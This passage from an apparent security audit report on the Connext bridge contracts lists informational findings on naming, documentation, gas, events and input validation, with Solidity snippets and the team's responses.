Context: General, compiler.
Description: The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite different compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined with static calls to zkSync's set of system precompile contracts.
Recommendation: Introduce the hardhat tooling provided by zkSync to compile and test the protocol (locally and on their testnet). Also note that the custom compiler is in development and does not have the full feature set of compilation options provided by Solidity (for example, --optimize-runs or --via-ir cannot be used).
zksolc -h:
    The zkEVM Solidity compiler 1.2.0
    Compiles the given Solidity input files (or the standard input if none given or "-" is used as a file name)
    and outputs the components specified in the options at standard output or in files in the output directory,
    if specified. Imports are automatically read from the filesystem.
    Example: zksolc ERC20.sol --optimize --output-dir './build/'
    USAGE:
        zksolc [FLAGS] [OPTIONS] [--] [input-files]...
    FLAGS:
        --abi              Output ABI specification of the contracts
        --asm              Output zkEVM assembly of the contracts
        --bin              Output zkEVM bytecode of the contracts
        --dump-assembly    Dump the zkEVM assembly of all contracts
        --dump-ethir       Dump the Ethereal Intermediate Representation (IR) of all contracts
        --dump-evm         Dump the EVM legacy assembly Intermediate Representation (IR) of all contracts
        --dump-llvm        Dump the LLVM Intermediate Representation (IR) of all contracts
        --dump-yul         Dump the Yul Intermediate Representation (IR) of all contracts
        --force-evmla      Sets the EVM legacy assembly pipeline forcibly
        --hashes           Output function signature hashes of the contracts
    -h, --help             Prints help information
        --optimize         Enable the LLVM bytecode optimizer
        --overwrite        Overwrite existing files (used together with -o)
        --standard-json    Switch to Standard JSON input / output mode. Reads from stdin, result is written to stdout
    -V, --version          Prints version information
        --yul              Switch to Yul mode
    OPTIONS:
        --allow-paths      Allow a given path for imports. A list of paths can be supplied by separating them
                           with a comma
        --base-path        Use the given path as the root of the source tree instead of the root of the filesystem
        --combined-json    Output a single json document containing the specified information.
                           Available arguments: abi, hashes
                           Example: solc --combined-json abi,hashes
        --include-path     Make an additional source directory available to the default import callback. Use this
                           option if you want to import contracts whose location is not fixed in relation to your
                           main source tree, e.g. third-party libraries installed using a package manager. Can be
                           used multiple times. Can only be used if base path has a non-empty value
    -l, --libraries        Direct string or file containing library addresses.
                           Syntax: <libraryName>=<address> [, or whitespace] ...
                           Address is interpreted as a hex string prefixed by 0x
        --llvm-opt         Sets the LLVM optimizer options
    -o, --output-dir       If given, creates one file per component and contract/file at the specified directory
        --solc             Path to the `solc` executable. By default, the one in $PATH is used
    ARGS:
        [input-files]...   The input file paths
Connext: Acknowledged.
Spearbit: Acknowledged.
+5.5.5 Shared logic in SwapUtilsExternal and SwapUtils can be consolidated, or their changes would need to be synced
Severity: Informational
Context:
• SwapUtilsExternal.sol#L17
• SwapUtils.sol#L18
• AmplificationUtils.sol#L13
• SwapUtils.sol#L715
Description: The SwapUtilsExternal library and SwapUtils share quite a lot of function (and event) logic. The main differences are:
• SwapUtilsExternal.swap does not have the following check, but SwapUtils.swap does:
    // File: connext/libraries/SwapUtils.sol#L715
    require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, "no fee token support");
This is actually one of the big/important diffs between the current SwapUtils and SwapUtilsExternal. Other differences are:
• Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal.
• AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external.
• SwapUtilsExternal does not implement exists.
• SwapUtilsExternal does not implement swapInternal.
• The SwapUtils Swap struct has an extra field key, as do the events in this file.
• Some inconsistent formatting.
Recommendation: It is recommended to consolidate/refactor shared features, or at least leave a note for the devs that the edits for SwapUtils and SwapUtilsExternal need to be synced. The same recommendation applies to AmplificationUtils and SwapUtilsExternal. Related issue: 155
Connext: Fee token support fixed in PR 2217. As for SwapUtilsExternal and SwapUtils, they are actually used in different contracts, the individual StableSwap contract and StableSwapFacet, so some functions are a bit different from each other.
Spearbit: Verified and acknowledged.
+5.5.6 Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirectPrice
Severity: Informational
Context: ConnextPriceOracle.sol#L162-L163
Description: setDirectPrice uses the following require statement to filter direct price reports by the owner:
    require(_timestamp - block.timestamp < 3, "in future");
Only prices with a _timestamp within 3s of the current block timestamp are allowed to be registered.
Recommendation: It would be best to document as to why the specific value of 3s was chosen here, and also to document how this reporting system works off-chain. Is the owner an agent or a bot that sources prices and sends transactions regularly to the setDirectPrice endpoint?
Connext: Introduced after the following C4 audit in Issue 205. Actually, we don't use PriceOracle in the current version, so that is out of the scope of the audit, and we don't have any off-chain infrastructure for updating the price of the oracle.
Spearbit: Acknowledged.
+5.5.7 Document what IConnectorManager entities would be passed to BridgeFacet
Severity: Informational
Context: BridgeFacet.sol#L239
Description: Document what type of IConnectorManager implementations the owner or an admin would set for s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors.
Recommendation: Add documentation.
Connext: Acknowledged.
Spearbit: Acknowledged.
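For illustration, the requested documentation could take a form like the following NatSpec fragment (hypothetical wording, attached wherever s.xAppConnectionManager is assigned):
    /**
     * @dev s.xAppConnectionManager may be any IConnectorManager implementation;
     *      in practice it is expected to be the SpokeConnector for this domain,
     *      the only implementation present in the codebase.
     */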
+5.5.8 Document what an internal swap pool would look like
Severity: Informational
Context:
• SwapAdminFacet.sol#L97-L98
• SwapAdminFacet.sol#L123
Description/Recommendation:
    @param _key the hash of the canonical id and domain for token
Document what token here refers to: whether it is just a general IERC20 token used in cross-chain transactions, and whether it can have canonical, adopted, representation, ... versions. That would mean pools are indexed by these tokens (one pool per canonical token per chain/domain).
The number of pooled tokens (let's not confuse this with the token mentioned in the above paragraph) is capped at 32. Document what a general set of pooled tokens could look like and how big they could get. Leave a comment as to why the cap of 32 was chosen.
Connext: Solved and documented in PR 2488 & PR 2360.
Spearbit: Verified.
+5.5.9 Second nonReentrant modifier
Severity: Informational
Context: BridgeFacet.sol#L258-L322, BridgeFacet.sol#L337-L369
Description: A previous version of xcall() had a nonReentrant modifier. This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protection, it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way, both execute() and xcall()/xcallIntoLocal() can each be called once at the most.
    function xcall(...) ... { }
    function xcallIntoLocal(...) ... { }
    function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { }
Recommendation: Consider adding a separate nonReentrant modifier to xcall()/xcallIntoLocal().
Connext: Solved in PR 2485.
Spearbit: Verified.
+5.5.10 Return 0 in swapToLocalAssetIfNeeded()
Severity: Informational
Context: AssetLogic.sol#L110-L136
Description: The return in the function swapToLocalAssetIfNeeded() could also return the literal 0, which is somewhat more readable and could save some gas. Note: after studying the compiler output, it might not actually save gas.
    function swapToLocalAssetIfNeeded(...) ... {
        if (_amount == 0) {
            return _amount;
        }
        ...
    }
Recommendation: Double-check whether gas is actually saved, and then consider changing the code to:
    -return _amount;
    +return 0;
Connext: Solved in PR 2212.
Spearbit: Verified.
+5.5.11 Use contract.code.length
Severity: Informational
Context: LibDiamond.sol#L254-L260, AssetLogic.sol#L454-L468
Description: Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in Solidity, which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further; see issue "isLocalOrigin can be optimized by using a named return parameter".
LibDiamond.sol
    function enforceHasContractCode(address _contract, string memory _errorMessage) internal view {
        uint256 contractSize;
        assembly {
            contractSize := extcodesize(_contract)
        }
        require(contractSize != 0, _errorMessage);
    }
AssetLogic.sol
    function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) {
        ...
        uint256 _codeSize;
        // solhint-disable-next-line no-inline-assembly
        assembly {
            _codeSize := extcodesize(_token)
        }
        return _codeSize != 0;
    }
Recommendation: Consider using contract.code.length.
Connext: Fixed in PR 2486.
Spearbit: Verified.
} Recommendation: Consider simplifying _swapAssetOut(). Connext: Solved in PR 2488. Spearbit: Verified. +5.5.14 Return default false in the function end Severity: Informational Context: MerklePatriciaProof.sol#L16 Description: verify function is missing a default return value. A return value of false can be added on the function end Recommendation: Return false at the end of function. 114 function verify( bytes memory value, bytes memory encodedPath, bytes memory rlpParentNodes, bytes32 root ) internal pure returns (bool) { ... if (traversed == 0) { return false; } pathPtr += traversed; nodeKey = bytes32(RLPReader.toUintStrict(currentNodeList[1])); } else { return false; } } return false; } Connext: This is in the polygon contracts, we will leave them as is. Spearbit: Acknowledged. +5.5.15 Change occurances of whitelist to allowlist Severity: Informational Context: General Description: In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive. Recommendation: We can replace all occurrences of whitelist with allowlist which actually conveys its function more clearly. For reference: draft-knodel-terminology-02#section-2.2 Connext: Solved in PR 2525. Spearbit: Verified. +5.5.16 Incorrect comment on _mirrorConnector Severity: Informational Context: SpokeConnector.sol#L155 Description: The comment on _mirrorConnector is incorrect as this does not denote address of the spoke connector Recommendation: Change the comment for _mirrorConnector to below: - * @param _mirrorConnector The address of the spoke connector. + * @param _mirrorConnector The address of the hub connector. Connext: Acknowledged. Spearbit: Acknowledged. 115 +5.5.17 addStableSwapPool can have a more suggestive name and also better documentation for the _- stableSwapPool input parameter is recommended Severity: Informational Context: • TokenFacet.sol#L210 • TokenFacet.sol#L164-L172 • TokenFacet.sol#L192-L198 Description: 1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwap- Pool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also a potential of having these pools have malicious or worthless tokens. What external pools does Connext team uses or is planning to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation. Recommendation: Add documentation. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.18 Setting _cap on non-canonical domains of an asset is not necessary. Severity: Informational Context: • TokenFacet.sol#L164-L172 • TokenFacet.sol#L192-L198 Description/Recommendation: When _canonical.domain != s.domain, setting/saving the supplied _cap is not necessary when calling setupAsset or setupAssetWithDeployedRepresentation. Since on non-canonical do- mains for an asset the check against _cap when adding liquidity for a router or when calling xcall... is never performed. 
Connext: Decided to revert when supplying a positive _cap to setupAsset or setupAssetWithDeployedRepresentation on a non-canonical domain. This solution is introduced in PR 2444. Also note that in the above PR, when s.caps[_key] is updated, s.custodied[canonical] is synced to IERC20(canonical).balanceOf(address(this)). Spearbit: Verified.
+5.5.19 _local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter Severity: Informational Context: • RoutersFacet.sol#L548 • RoutersFacet.sol#L599 • RoutersFacet.sol#L520 • RoutersFacet.sol#L500 • RoutersFacet.sol#L486 • RoutersFacet.sol#L472 Description: The name of the _local parameter is misleading, since it is used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first, then checks if the input parameter is a canonical token for the current domain, then uses the representationToCanonical mapping. So here _local could be an adopted token. Recommendation: It would be best to rename _local to _asset, since in other places in the codebase the word local hints that the token is either a canonical or a representation token. Connext: _addLiquidityForRouter and _removeLiquidityForRouter are required to use only local tokens and not adopted ones. The changes in PR 2489 enforce that. Also, the AssetAllowlist functionality has been removed from the protocol; therefore routers can only provide/add liquidity for approved assets. Spearbit: Verified.
+5.5.20 Document _calculateSwap's and _calculateSwapInv's calculations Severity: Informational Context: • SwapUtils.sol#L545 • SwapUtils.sol#L581 • SwapUtilsExternal.sol#L582 • SwapUtilsExternal.sol#L618 Description: In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is because, given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: • y = xp[tokenIndexTo], which would in turn make dy = -1 and revert the call. This case would need to be investigated. • y = xp[tokenIndexTo] - 1, which would in turn make dy = 0 and so the call would return (0, 0). • y = xp[tokenIndexTo] + 1, which would in turn make dy = -2 and revert the call. This case would need to be investigated. And similarly in _calculateSwapInv, doing the same analysis for the + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: • xp[tokenIndexFrom] + 1, then dx = 2; • xp[tokenIndexFrom], then dx = 1; • xp[tokenIndexFrom] - 1, then dx = 0. Note that the behavior is different here, and the call would never revert. Recommendation: It would be great to analyze and document the decision as to why + 1 and - 1 were chosen in those calculations. Connext: Acknowledged. Spearbit: Acknowledged.
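To make the rounding behavior in 5.5.20 concrete, a minimal annotated sketch (paraphrasing the quoted expressions, not the full SwapUtils code):

  // getY solves the invariant for the output-side balance; integer rounding means
  // the result can be off by roughly one wei in either direction.
  uint256 y = getY(preciseA, tokenIndexFrom, tokenIndexTo, x, xp);
  // The extra -1 rounds the output down so rounding errors favor the pool;
  // if y >= xp[tokenIndexTo], this subtraction underflows and the call reverts (Solidity >= 0.8).
  uint256 dy = xp[tokenIndexTo] - y - 1;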
+5.5.21 Providing a from amount equal to the pool's from token balance might return a value different from the current pool's to balance Severity: Informational Context: SwapUtils.sol#L426-L432 Description: Note that, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (i.e. no change in the asset balance of the tokenIndexFrom token in the pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring the pool back to satisfying the stable swap invariant. One source that can introduce such an imbalance is a ramping of the scaled amplification coefficient. Recommendation: It would be great to leave a comment/warning for users/devs to make them aware of this fact. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.22 Document what type 0 means for TypedMemView Severity: Informational Context: Message.sol#L94 Description: In the following line, 0 is passed as the new type for a TypedMemView bytes29: _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies. Recommendation: Document what type 0 means for TypedMemView. Connext: Type 0 just reserves the first byte when you are manipulating the memview (since they should all be typed) -- kind of the same as a null type. Spearbit: Acknowledged.
+5.5.23 Mixed use of require statements and custom errors Severity: Informational Context: General Description: The codebase includes a mix of require statements and custom errors. Recommendation: For consistency, and in some cases cheaper gas costs, it would be best to use custom errors throughout the whole project. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.24 WatcherManager can make watchers public instead of having a getter function Severity: Informational Context: WatcherManager.sol#L18, WatcherManager.sol#L47 Description: WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make the mapping public to avoid the need for an explicit getter function. Recommendation: Consider removing the isWatcher() function, making watchers public and renaming it to isWatcher; this does not change WatcherManager's external interface (a sketch follows below). If applying this recommendation, take into account any plans to add a contract inheriting from WatcherManager: that contract would then have the ability to modify isWatcher. Connext: Solved in PR 2449. Spearbit: Verified.
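A minimal sketch of the 5.5.24 recommendation (access control elided; addWatcher shown only for context):

  contract WatcherManager {
    // A public mapping makes the compiler generate
    // `function isWatcher(address) external view returns (bool)`,
    // so the explicit getter can be removed without changing the external interface.
    mapping(address => bool) public isWatcher;

    function addWatcher(address _watcher) external /* onlyOwner in the real contract */ {
      isWatcher[_watcher] = true;
    }
  }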
+5.5.25 Incorrect comment about relation between zero amount and asset Severity: Informational Context: BridgeFacet.sol#L514-L515 Description: At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _xcall() reverts when the zero address is specified for _asset with a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment, if the amount is 0, _asset also has to be the zero address, which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); Recommendation: Update the comment to: _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above that amount is 0 IF asset is address(0) : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); Additionally, consider whether a 0-amount transfer should be allowed for a non-zero asset. The ERC20 standard allows that, so an argument can be made to allow 0-amount cross-chain transfers; however, reverting in this case results in cleaner code. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.26 New Connector needs to be deployed if the AMB changes Severity: Informational Context: Connector.sol#L42 Description: The AMB address is configured to be immutable. If any chain's AMB changes, the Connector needs to be redeployed. /** * @notice Address of the AMB on this domain. */ address public immutable AMB; Recommendation: Consider removing the immutable modifier and allowing the AMB address to be updated if needed. Connext: The connectors are designed to be dropped and redeployed. It is likely a new AMB contract would require additional changes anyway. Spearbit: Acknowledged.
+5.5.27 Functions should be renamed Severity: Informational Context: ArbitrumHubConnector.sol#L86, OptimismHubConnector.sol#L87, ZkSyncHubConnector.sol#L88 Description: The following functions should be renamed to align with the naming convention of the fxPortal contracts. • OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild • ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild • ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild Recommendation: Update the function names accordingly. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.28 Function aggregate() defined twice Severity: Informational Context: Multicall.sol#L13, RootManager.sol#L185 Description: Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... } RootManager.sol function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... } Recommendation: Consider renaming one of the functions, or deprecating contract Multicall if it isn't used. Connext: Contract Multicall is removed in PR 2373. Spearbit: Verified.
+5.5.29 Careful when using _removeAssetId() Severity: Informational Context: TokenFacet.sol#L354-L383 Description: The function _removeAssetId() removes an asset. Although it is called via authorized functions, mistakes could be made. If there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and allowed in the StableSwap; if so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... } Recommendation: Check if representation tokens are still present/allowed in the StableSwap. Also consider checking how many of the tokens are in circulation. Connext: Solved in PR 2483. Spearbit: Verified.
+5.5.30 Unused import IAavePool in InboxFacet Severity: Informational Context: InboxFacet.sol#L13 Description: Contract InboxFacet imports IAavePool, but doesn't use it. import {IAavePool} from "../interfaces/IAavePool.sol"; Recommendation: Remove the import: -import {IAavePool} from "../interfaces/IAavePool.sol"; Connext: Solved in PR 2491. Spearbit: Verified.
+5.5.31 Use IERC20Metadata Severity: Informational Context: BridgeFacet.sol#L6, BridgeFacet.sol#L514-L516, AssetLogic.sol#L5 Description: The contract ERC20 is imported a few times to be able to access the decimals() interface. This interface can also be retrieved from the OpenZeppelin interface @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... } Recommendation: Consider using @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol instead of ERC20.sol. Connext: Solved in PR 2491. Spearbit: Verified.
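A self-contained sketch of the 5.5.31 swap (helper name hypothetical): only the metadata interface is needed to read decimals(), not the full ERC20 implementation contract.

  // SPDX-License-Identifier: MIT
  pragma solidity ^0.8.0;

  import {IERC20Metadata} from "@openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol";

  library DecimalsReader { // hypothetical helper for illustration
    function decimalsOf(address _asset) internal view returns (uint8) {
      // same call as ERC20(_asset).decimals(), via the lighter interface import
      return IERC20Metadata(_asset).decimals();
    }
  }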
+5.5.32 Generic name of proposedTimestamp() Severity: Informational Context: ProposedOwnableFacet.sol#L106-L122 Description: The function proposedTimestamp() has a very generic name. As there are other timestamp functions, this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; } Recommendation: Consider renaming proposedTimestamp() to proposedOwnershipTimestamp(). Connext: It is not quite as specific as it could be, but changing the name would create an annoying interface difference with ProposedOwnable. Spearbit: Acknowledged.
+5.5.33 Two different nonces Severity: Informational Context: LibConnextStorage.sol#L139, SpokeConnector.sol#L131-L133 Description: Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar, this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces; Recommendation: Consider renaming one of the nonces. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.34 Tips to optimize rootWithCtx Severity: Informational Context: Merkle.sol#L122-L126 Description: To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... } Recommendation: If you do want to optimize, the link above can be used. However, it is unlikely to yield a large saving. Connext: Acknowledged. Spearbit: Acknowledged.
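For reference on 5.5.34, the lookup-free baseline is a simple loop (library name hypothetical); the linked bit-hack replaces this with a constant-time De Bruijn / mod-37 table lookup:

  // SPDX-License-Identifier: MIT
  pragma solidity ^0.8.0;

  library BitScan { // hypothetical helper for illustration
    function trailingZeroBits(uint256 x) internal pure returns (uint256 n) {
      if (x == 0) return 256; // every bit is zero
      while (x & 1 == 0) {
        x >>= 1; // strip one trailing zero bit per iteration
        unchecked { ++n; }
      }
    }
  }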
+5.5.35 Use delete Severity: Informational Context: ProposedOwnable.sol#L161-L167, RoutersFacet.sol#L315 Description: The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete, so using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... } Recommendation: Consider changing the code to: function _setOwner(address newOwner) internal { ... - _proposedOwnershipTimestamp = 0; + delete _proposedOwnershipTimestamp; - _proposed = address(0); + delete _proposed; ... } function removeRouter(address router) external onlyOwnerOrRouter { ... - s.routerPermissionInfo.routerOwners[router] = address(0); + delete s.routerPermissionInfo.routerOwners[router]; ... - s.routerPermissionInfo.routerRecipients[router] = address(0); + delete s.routerPermissionInfo.routerRecipients[router]; ... } Connext: Solved in PR 2492. Spearbit: Verified.
+5.5.36 Replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety Severity: Informational Context: • SpokeConnector.sol#L520-L526 Description: • When abi.encodeWithSignature is used, the compiler does not check for mistakes in the signature or the types provided. • When abi.encodeWithSelector is used, the compiler does not check for parameter type inconsistencies. Recommendation: Create an interface for contracts that implement handle(uint32,uint32,bytes32,bytes), for example IHandle, and use the following instead to be typo- and type-safe: bytes memory _calldata = abi.encodeCall( IHandle.handle, ( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ) ); This suggestion also applies to other locations where abi.encodeWithSignature or abi.encodeWithSelector has been used. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.37 setAggregators is missing checks against address(0) Severity: Informational Context: ConnextPriceOracle.sol#L178 Description: setAggregators does not check whether tokenAddresses[i] or sources[i] is address(0). Recommendation: Add checks to avoid potential pitfalls. Connext: Solved in PR 2232. Spearbit: Verified.
+5.5.38 setAggregators can be simplified Severity: Informational Context: ConnextPriceOracle.sol#L178 Description: setAggregators does not check that the tokenAddresses length equals the sources length, to revert early. Recommendation: Check that the tokenAddresses length equals the sources length. As an alternative, a struct like the one below can be passed to avoid needing the length-equality check for these two arrays: struct AggregatorData { address token; address source; } ... function setAggregators(AggregatorData[] calldata _aggregatorData) external onlyOwner { A good side effect is that the encoded calldata for setAggregators would also be smaller. Connext: Solved in PR 2232. Spearbit: Verified.
+5.5.39 Event is not emitted when an important action happens on-chain Severity: Informational Context: • PortalFacet.sol#L57 • PortalFacet.sol#L64 • SpokeConnector.sol#L220 • SpokeConnector.sol#L418 • SpokeConnector.sol#L480 • ZkSyncHubConnector.sol#L124 Description: No event is emitted when an important action happens on-chain. Recommendation: We recommend emitting an event for each context mentioned in this issue (see the sketch after this list). • PortalFacet.sol#L57 : No event is emitted when the aavePool is changed: event AavePoolChanged(address oldAavePool, address newAavePool, address caller); • PortalFacet.sol#L64 : No event is emitted when aavePortalFeeNumerator is updated. • SpokeConnector.sol#L220 : No event is emitted when setDelayBlocks is called. • SpokeConnector.sol#L418 : No event is emitted when provenAggregateRoots[_aggregateRoot] is set. • SpokeConnector.sol#L480 : No event is emitted when provenMessageRoots[_messageRoot] is set. • ZkSyncHubConnector.sol#L124 : No event is emitted when a new root has been processed. Connext: Solved in PR 2493. Spearbit: Verified.
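A hedged sketch for the SpokeConnector case in 5.5.39 (event name hypothetical; assumes a uint256 delayBlocks storage variable as the referenced context suggests):

  event DelayBlocksUpdated(uint256 previous, uint256 updated, address caller); // hypothetical event

  function setDelayBlocks(uint256 _delayBlocks) public onlyOwner {
    emit DelayBlocksUpdated(delayBlocks, _delayBlocks, msg.sender);
    delayBlocks = _delayBlocks;
  }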
+5.5.40 Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length Severity: Informational Context: Queue.sol#L130 Description: It is always assumed that last + 1 >= first. It would be great to add unit/fuzz tests to check this invariant. Recommendation: Adding these tests should catch potential future mistakes. Connext: Yes, if first > last, it should only ever be by 1 (and indicates that the queue is full). We should fuzz to check whether any invariant states are attainable. We could add a require (or custom error) case here where we check this assumption, but I think it's a waste of gas if it's a provably unattainable state ('provable' via testing). Spearbit: Acknowledged.
+5.5.41 Consider using prefix(...) instead of slice(0,...) Severity: Informational Context: • BridgeMessage.sol#L232 • TypedMemView.sol#L493 Description: tokenId() calls the TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal. Recommendation: Consider using TypedMemView.prefix() instead of slice(). Connext: We think slice is slightly more readable, and consistent with other BridgeMessage implementations. Spearbit: Acknowledged.
+5.5.42 Elaborate TypedMemView encoding in comments Severity: Informational Context: TypedMemView.sol#L33-L35 Description: TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous. Recommendation: // next 12 bytes are memory address from where the memory view starts // next 12 bytes are length (in bytes) of the memory view // bottom 3 bytes are empty Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.43 Remove Curve StableSwap paper URL Severity: Informational Context: SwapUtils.sol#L63, SwapUtilsExternal.sol#L55 Description: The link to the Curve StableSwap paper referenced in the comments is no longer active: www.curve.fi/stableswap-paper.pdf. The current working URL is curve.fi/files/stableswap-paper.pdf. Recommendation: Consider removing the URL from the comments and just referring to the "Curve stableswap paper". Connext: Fixed in PR 2215. Spearbit: Verified.
+5.5.44 Missing Validations in AmplificationUtils.sol Severity: Informational Context: AmplificationUtils.sol#L85-L86 Description: 1. If initialAPrecise == futureAPrecise then there will not be any ramping. 2. In the stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp, since once the current timestamp has reached futureATime, the future A value will always be returned. Recommendation: Add a check to ensure initialAPrecise != futureAPrecise (see the sketch below). Connext: Issue number 1 is fixed by PR 2220. Issue number 2 was identified as a false positive as mentioned in the Spearbit section; kindly reject the resolution PR 2219. Spearbit: The current check in the audit repo is better since, when self.futureATime == block.timestamp, calling or not calling stopRampA makes no difference. Stopping the ramp is only effective just before we reach self.futureATime and a1 != a0. Also, a self.futureATime >= block.timestamp check would incur more gas usage.
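A one-line guard covering issue 1 of 5.5.44, placed inside rampA once initialAPrecise and futureAPrecise are computed (error name hypothetical):

  if (initialAPrecise == futureAPrecise) revert AmplificationUtils__rampA_aNotChanged(); // hypothetical error: the ramp would be a no-op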
